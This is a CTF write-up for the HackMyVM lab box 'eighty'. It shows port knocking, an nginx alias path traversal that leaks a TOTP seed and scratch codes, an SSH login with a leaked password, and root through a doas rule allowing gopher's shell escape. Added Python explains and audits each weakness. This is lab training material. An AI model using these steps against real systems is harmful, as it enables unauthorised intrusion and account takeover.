[hackmyvm] eighty box writeup

Posted in: server, 2024/12/23 11:10:00

tags:

  • HMV
  • gopher
  • doas privilege escalation (a sudo alternative)
  • knock
  • path traversal
    Type: wp
    dg-publish: true
    Difficulty: ⭐️⭐️⭐️
    Author: sml
    OS: Linux

Table of contents

    • 2. Information gathering
      • 2.1. Port scanning
      • 2.2. Port knocking
      • 2.3. Directory scanning
      • 2.4. Path traversal
    • 3. Privilege escalation

2. Information gathering

2.1. Port scanning

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap -sVC  192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:33 EST
Nmap scan report for 192.168.56.8
Host is up (0.000055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)
|   256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)
|_  256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)
70/tcp open     http    pygopherd web-gopher gateway
|_http-title: Gopher
| gopher-ls:
|_[txt] /howtoconnect.txt "Connection"
80/tcp filtered http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds

Port 80 is filtered by a firewall.
Port 70 serves gopher, and its listing contains a single file, howtoconnect.txt.

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8:70/howtoconnect.txt
Ping us to: 4767 2343 3142

This is the hint: knock on these three ports in order to open port 80.

2.2. Port knocking

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# knock 192.168.56.8 4767 2343 3142 -v
hitting tcp 192.168.56.8:4767
hitting tcp 192.168.56.8:2343
hitting tcp 192.168.56.8:3142

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap 192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:37 EST
Nmap scan report for 192.168.56.8
Host is up (0.00044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
70/tcp open  gopher
80/tcp open  http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8
Hi.
<!-- 80 -->

After the knock sequence, port 80 is open.
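How the server side of this works, as an added example (not code from the writeup or from knockd): a small tracker in the style of a knock daemon that watches inbound SYNs per source and only opens port 80 for a source that hits 4767, 2343, 3142 in that order. The event stream, the 10 s inter-knock timeout and the "open port 80" action are constructed assumptions; only the sequence itself comes from howtoconnect.txt.

```python
"""Port-knock sequence tracking, in the style of knockd.

Added example (not code from the writeup or from knockd): it models how a
knock daemon decides that a source completed the sequence 4767 2343 3142
from howtoconnect.txt before it opens port 80 to that source.  The event
stream, the 10 s inter-knock timeout and the "open port 80" action are
constructed assumptions for illustration.
"""
from dataclasses import dataclass, field

SEQUENCE = [4767, 2343, 3142]   # from howtoconnect.txt on the box
TIMEOUT = 10.0                  # assumed: max seconds between two knocks


@dataclass
class KnockTracker:
    sequence: list
    timeout: float = TIMEOUT
    progress: dict = field(default_factory=dict)   # src -> (next_index, last_hit_time)
    opened: set = field(default_factory=set)       # sources that completed the sequence

    def hit(self, src, port, t):
        """Feed one inbound SYN (source, destination port, timestamp).

        Returns True at the moment `src` completes the sequence in order.
        A wrong port, or a pause longer than `timeout`, resets that source.
        """
        idx, last = self.progress.get(src, (0, t))
        if t - last > self.timeout:
            idx = 0
        if port == self.sequence[idx]:
            idx += 1
        else:
            # out of order: restart, counting this hit if it is the first knock
            idx = 1 if port == self.sequence[0] else 0
        if idx == len(self.sequence):
            self.opened.add(src)
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, t)
        return False


# Constructed events: (source IP, destination port, seconds since start).
EVENTS = [
    ("192.168.56.1", 4767, 0.0),
    ("192.168.56.1", 2343, 0.2),
    ("192.168.56.1", 3142, 0.4),    # correct order, quickly: opens
    ("192.168.56.9", 4767, 1.0),
    ("192.168.56.9", 3142, 1.1),    # second knock out of order: reset
    ("192.168.56.9", 2343, 1.2),
    ("192.168.56.7", 4767, 5.0),
    ("192.168.56.7", 2343, 30.0),   # 25 s pause exceeds the timeout: reset
    ("192.168.56.7", 3142, 30.5),
]


def replay(events, sequence=SEQUENCE, timeout=TIMEOUT):
    """Run events through a tracker; return the sources that got port 80 opened."""
    tracker = KnockTracker(list(sequence), timeout)
    for src, port, t in events:
        tracker.hit(src, port, t)
    return sorted(tracker.opened)


if __name__ == "__main__":
    for src in replay(EVENTS):
        print("open tcp/80 for", src)
```

Only the knocking source gets the port, which is why the first nmap scan showed 80/tcp as filtered: nmap sends its probes in a randomised port order, so a full-range scan does not normally hit the three ports in sequence.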

2.3. Directory scanning

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# dirsearch -u http://192.168.56.8
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/hmv/eighty/reports/http_192.168.56.8/_24-12-19_22-38-36.txt

Target: http://192.168.56.8/

[22:38:36] Starting:
[22:38:51] 200 -   18B  - /robots.txt

Task Completed

It finds a /robots.txt.


┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/robots.txt
/nginx_backup.txt

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/nginx_backup.txt
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
}
server {
    server_name henry.eighty.hmv;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    location /web {
        alias /home/henry/web/;
    }
}
server {
    server_name susan.eighty.hmv;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    location /web {
        alias /home/susan/web/;
    }
}

This gives us an nginx configuration file.
It reveals two virtual host names, henry.eighty.hmv and susan.eighty.hmv, and with them two users, henry and susan.
Add both host names to /etc/hosts.

It also gives us two paths:
henry.eighty.hmv/web/
susan.eighty.hmv/web/

Brute-force both paths.
Under susan's directory we find a file.

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# gobuster dir -u  susan.eighty.hmv/web/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,zip,jpg,png,txt,rar
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://susan.eighty.hmv/web/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              jpg,png,txt,rar,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 40]
/lostpasswd.txt       (Status: 200) [Size: 50]
Progress: 1661144 / 1661152 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web/lostpasswd.txt
8ycrois-tu0 + /home/susan/secret/.google-auth.txt

2.4. Path traversal

This reveals a path: /home/susan/secret/.google-auth.txt.
We can read that file through a path traversal.

It works because location /web is written loosely; the correct form is location /web/. Without the trailing slash, a request for /web../ still matches the /web prefix, nginx replaces that prefix with the alias directory, and the resulting file path is /home/susan/web/../, one level above the intended root.
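To make the mapping concrete, here is an added example (not code from the writeup or from nginx) that reimplements only the two steps of nginx request handling that matter here, dot-segment normalisation of the URI and then prefix-location match with alias substitution, so the effect of the missing slash can be checked offline. The alias and location strings are taken from nginx_backup.txt above; everything else is constructed.

```python
"""Why "location /web" + "alias /home/susan/web/" maps requests outside /web.

Added example, not from the writeup or from nginx: it reimplements only the
two steps of nginx request handling that matter here (dot-segment
normalisation of the URI, then prefix-location match with alias
substitution) so the mapping can be checked offline.  Paths and location
strings come from nginx_backup.txt above.
"""
import posixpath

ALIAS = "/home/susan/web/"   # from the susan.eighty.hmv server block


def normalize_uri(uri):
    """Collapse ./ and ../ segments as nginx does before matching locations, keeping a trailing slash."""
    norm = posixpath.normpath(uri)
    if uri.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def resolve(uri, location, alias=ALIAS):
    """Filesystem path nginx opens for `uri` under prefix `location` with `alias`, or None if no match."""
    uri = normalize_uri(uri)
    if not uri.startswith(location):
        return None
    # alias: the matched prefix is replaced by the alias directory; the rest is appended verbatim
    return posixpath.normpath(alias + uri[len(location):])


def escapes_alias(uri, location, alias=ALIAS):
    """True when the resolved path lies outside the alias directory (a traversal)."""
    path = resolve(uri, location, alias)
    root = posixpath.normpath(alias)
    return path is not None and path != root and not path.startswith(root + "/")


if __name__ == "__main__":
    for loc in ("/web", "/web/"):
        for req in ("/web/index.html", "/web../secret/.google-auth.txt", "/web/../secret/x"):
            print("%-6s %-36s -> %s" % (loc, req, resolve(req, loc)))
```

Two things stand out from running it: a normal `/web/../secret/x` request is harmless because nginx normalises the `..` away before matching, so it never reaches the /web location, whereas `/web..` is a single path segment that survives normalisation, matches the bare `/web` prefix, and only turns into `..` after the alias is glued on. The same loose prefix also maps `/webfoo` to `/home/susan/web/foo`. With `location /web/` neither request matches.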

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web../secret/.google-auth.txt
2GN7KARBONVR55R7SP3UZPN3ZM
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
27074208
60216448
17908010

This is a TOTP (Time-Based One-Time Password) configuration file, the kind used by two-factor authentication (2FA) to hold the seed and its parameters.
2GN7KARBONVR55R7SP3UZPN3ZM is the TOTP secret key (seed), normally a Base32-encoded string; it is what the time-sensitive one-time passwords are generated from.

Put simply, the login needs a verification code in addition to the password. Any one of the codes listed below can be used.
Log in with the password 8ycrois-tu0 and one of those codes.
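What the file gives away, as an added example (not code from the writeup or from google-authenticator): a parser for the file layout shown above (Base32 seed on the first line, options prefixed with a double quote, one 8-digit scratch code per line) and the server-side check that PAM would perform with it, i.e. RFC 6238 TOTP (HMAC-SHA1, 30 s step, 6 digits) with a small acceptance window and single-use scratch codes. The sample file content is constructed with the RFC 6238 test secret, not the box's real seed.

```python
"""Parse a google-authenticator secret file and verify codes against it.

Added example, not from the writeup: the file layout (Base32 secret, options
prefixed with a double quote, one scratch code per line) is the one shown
above; the TOTP computation follows RFC 6238 (HMAC-SHA1, 30 s step,
6 digits).  The file content below is constructed with the RFC 6238 test
secret, not the box's real seed.
"""
import base64
import hashlib
import hmac
import struct

# Constructed sample in the same layout as /home/susan/secret/.google-auth.txt.
# Secret = Base32 of the RFC 4226/6238 test key "12345678901234567890".
SAMPLE_FILE = """GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
"""


def parse_auth_file(text):
    """Split the file into seed, option lines and the set of unused scratch codes."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    return {
        "secret": lines[0],
        "options": [ln[1:].strip() for ln in lines[1:] if ln.startswith('"')],
        "scratch_codes": {ln for ln in lines[1:] if ln.isdigit() and len(ln) == 8},
        "used_steps": set(),   # time steps already accepted (DISALLOW_REUSE)
    }


def hotp(secret_b32, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    key = base64.b32decode(secret_b32.upper())
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % (10 ** digits))


def totp(secret_b32, unix_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from the current 30 s step."""
    return hotp(secret_b32, unix_time // step, digits)


def verify(auth, code, unix_time, window=1):
    """Server-side check: an unused scratch code, or a TOTP within +/- `window` steps, each step once."""
    if code in auth["scratch_codes"]:
        auth["scratch_codes"].discard(code)   # scratch codes are one-shot
        return True
    base = unix_time // 30
    for step in range(base - window, base + window + 1):
        if step in auth["used_steps"]:
            continue
        if hmac.compare_digest(hotp(auth["secret"], step), code):
            auth["used_steps"].add(step)       # DISALLOW_REUSE: never accept the same step twice
            return True
    return False


if __name__ == "__main__":
    import time
    auth = parse_auth_file(SAMPLE_FILE)
    now = int(time.time())
    print("current code for the sample seed:", totp(auth["secret"], now))
    print("verifies:", verify(auth, totp(auth["secret"], now), now))
```

The point for a defender is that everything needed to pass the second factor sits in one file: the seed regenerates the current code at any time, and the scratch codes below it are accepted as-is until used. The example models DISALLOW_REUSE; WINDOW_SIZE 17 in the real file accepts 17 consecutive codes (the current one and eight on either side), and RATE_LIMIT 3 30 (three attempts per 30 s) is not modelled here.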


┌──(root㉿kali)-[~]
└─# ssh susan@192.168.112.23
(susan@192.168.112.23) Password:
(susan@192.168.112.23) Verification code:
Linux eighty 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr  7 07:05:11 2021
susan@eighty:~$ sh flag.sh
[ASCII-art banner omitted]
-------------------------
PWNED HOST: eighty
PWNED DATE: Thu 19 Dec 2024 11:48:18 PM EST
WHOAMI: uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
FLAG: hmv8use0red
------------------------

3. Privilege escalation

susan@eighty:~$ find / -perm -4000 2>/dev/null
/usr/local/bin/doas
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount

Here we find doas.
https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation#doas

There are some alternatives to the sudo binary, such as OpenBSD's doas; remember to check its configuration file /etc/doas.conf:
permit nopass demo as root cmd vim

susan@eighty:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
susan@eighty:~$ cat /usr/local/etc/doas.conf
permit nolog susan as root cmd gopher

So susan is allowed to run gopher as root.
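A rule like this is easy to spot mechanically. The following is an added example (not code from the writeup or from the doas project): a parser for the rule grammar seen on this page (permit|deny [options] identity [as target] [cmd command [args ...]]) and a check that flags permit rules which reach root either without a password (nopass) or through a program with a built-in shell escape, such as the gopher client's "!" used below. The sample configuration is constructed from the two rules quoted above; the shell-escape list is an illustrative set of well-known programs, not a complete one.

```python
"""Audit doas.conf for rules that hand out a root shell.

Added example, not from the writeup or from the doas project: a parser for
the rule grammar seen above (permit|deny [options] identity [as target]
[cmd command [args ...]]) and a check that flags rules granting root with
no password or through a program that has a built-in shell escape.  The
sample configuration is constructed from the rules quoted on this page;
the shell-escape list is an illustrative set of well-known programs, not a
complete one.
"""
import shlex

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}   # setenv { ... } is not modelled

# Interactive programs that can start a shell for the caller; gopher's "!" is used on this page.
SHELL_ESCAPE_CMDS = {"gopher", "vim", "vi", "less", "more", "man"}

SAMPLE_DOAS_CONF = """# constructed sample doas.conf
permit nolog susan as root cmd gopher
permit nopass demo as root cmd vim
permit persist alice as root cmd apt args update
deny bob
"""


def parse_rule(line):
    """Return one rule as a dict, or None for blank and comment lines."""
    toks = shlex.split(line, comments=True)
    if not toks:
        return None
    rule = {"action": toks[0], "options": set(), "identity": None,
            "target": None, "cmd": None, "args": None}
    i = 1
    while i < len(toks) and toks[i] in OPTIONS:
        rule["options"].add(toks[i])
        i += 1
    if i >= len(toks):
        raise ValueError("rule without identity: %r" % line)
    rule["identity"] = toks[i]
    i += 1
    while i < len(toks):
        key = toks[i]
        if key == "as":
            rule["target"] = toks[i + 1]
            i += 2
        elif key == "cmd":
            rule["cmd"] = toks[i + 1]
            i += 2
        elif key == "args":
            rule["args"] = toks[i + 1:]
            break
        else:
            raise ValueError("unexpected token %r in %r" % (key, line))
    return rule


def audit(text):
    """Return (identity, finding) pairs for permit rules that can reach root dangerously."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["action"] != "permit":
            continue
        # No "as" clause means any target user, root included (doas.conf(5)).
        if rule["target"] not in (None, "root"):
            continue
        who, cmd = rule["identity"], rule["cmd"]
        if cmd is None:
            findings.append((who, "any command as root"))
        elif cmd in SHELL_ESCAPE_CMDS:
            findings.append((who, "%s as root allows a shell escape" % cmd))
        if "nopass" in rule["options"]:
            findings.append((who, "nopass: no password required"))
    return findings


if __name__ == "__main__":
    for who, why in audit(SAMPLE_DOAS_CONF):
        print("%-6s %s" % (who, why))
```

Note where the real file lived on this box: /usr/local/etc/doas.conf rather than /etc/doas.conf, because doas was installed under /usr/local. An audit that only reads /etc/doas.conf would have missed it, so locate the binary first and check the config path it was built with.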

doas -u root gopher

Enter the password, then type ! at the gopher prompt:

Spawning your default shell.  Type 'exit' to return to Gopher.
root@eighty:/home/susan# id
uid=0(root) gid=0(root) groups=0(root)
root@eighty:/home/susan# whoami
root
root@eighty:/home/susan#
root@eighty:~# sh fl4g.sh
[ASCII-art banner omitted]
-------------------------
PWNED HOST: eighty
PWNED DATE: Fri Dec 20 00:01:53 EST 2024
WHOAMI: uid=0(root) gid=0(root) groups=0(root)
FLAG: rooted80shmv
------------------------

http://www.ppmy.cn/server/152474.html
